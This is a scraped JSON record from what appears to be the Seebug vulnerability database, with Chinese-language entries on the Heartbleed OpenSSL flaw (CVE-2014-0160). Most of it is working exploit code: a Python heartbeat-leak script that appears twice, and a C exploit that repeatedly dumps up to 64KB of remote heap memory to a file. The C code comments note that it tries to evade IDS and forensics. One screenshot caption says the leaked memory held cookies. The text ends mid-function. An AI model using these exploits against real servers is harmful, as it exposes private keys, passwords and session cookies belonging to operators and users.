\u81ea\u5df1\u6d4b\u8bd5\n\n\n```\n#!/usr/bin/python\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n #print pay\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\nif __name__ == '__main__':\n main()\n```\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg\" alt=\"1.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg\" alt=\"2.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg)\n\n\n\u5185\u5b58\u91cc\u6709cookies \n\n[<img src=\"https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg\" alt=\"3.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg)", "modified": "2014-04-11T00:00:00", "published": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-95013", "id": "SSV:95013", "title": "\u4ebf\u90ae\u67d0\u7248\u672cOPENSSL heartbleed \u901a\u6740", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:28:38", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u7531\u4e8e\u5904\u7406TLS heartbeat\u6269\u5c55\u65f6\u7684\u8fb9\u754c\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u62ab\u9732\u8fde\u63a5\u7684\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5b58\u50a8\u5668\u5185\u5bb9\u3002\r\n0\r\nOpenSSL 1.0.2-beta\r\nOpenSSL 1.0.1\r\nOpenSSL 1.0.1g\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u5347\u7ea7\u4f7f\u7528\uff1a\r\nhttp://www.openssl.org/", "modified": "2014-04-08T00:00:00", "published": "2014-04-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62086", "id": "SSV:62086", "title": "OpenSSL TLS Hearbeat\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-62086"}, {"lastseen": "2017-11-19T17:26:43", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nOracle Session Monitor Suite\u662f\u4e00\u6b3eOracle\u516c\u53f8\u63a8\u51fa\u7684\u4f1a\u8bdd\u76d1\u89c6\u5957\u4ef6\u3002\r\n\r\nOracle Session Monitor Suite\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\r\n0\r\nOracle Session Monitor Suite 3.x\r\nOracle Session Monitor Suite 3.3.40.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.oracle.com", "modified": "2014-04-21T00:00:00", "published": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62240", "id": "SSV:62240", "title": "Oracle Session Monitor Suite OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T14:03:33", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86061", "id": "SSV:86061", "title": "Heartbleed OpenSSL - Information Leak Exploit (1)", "type": "seebug", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65535 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, 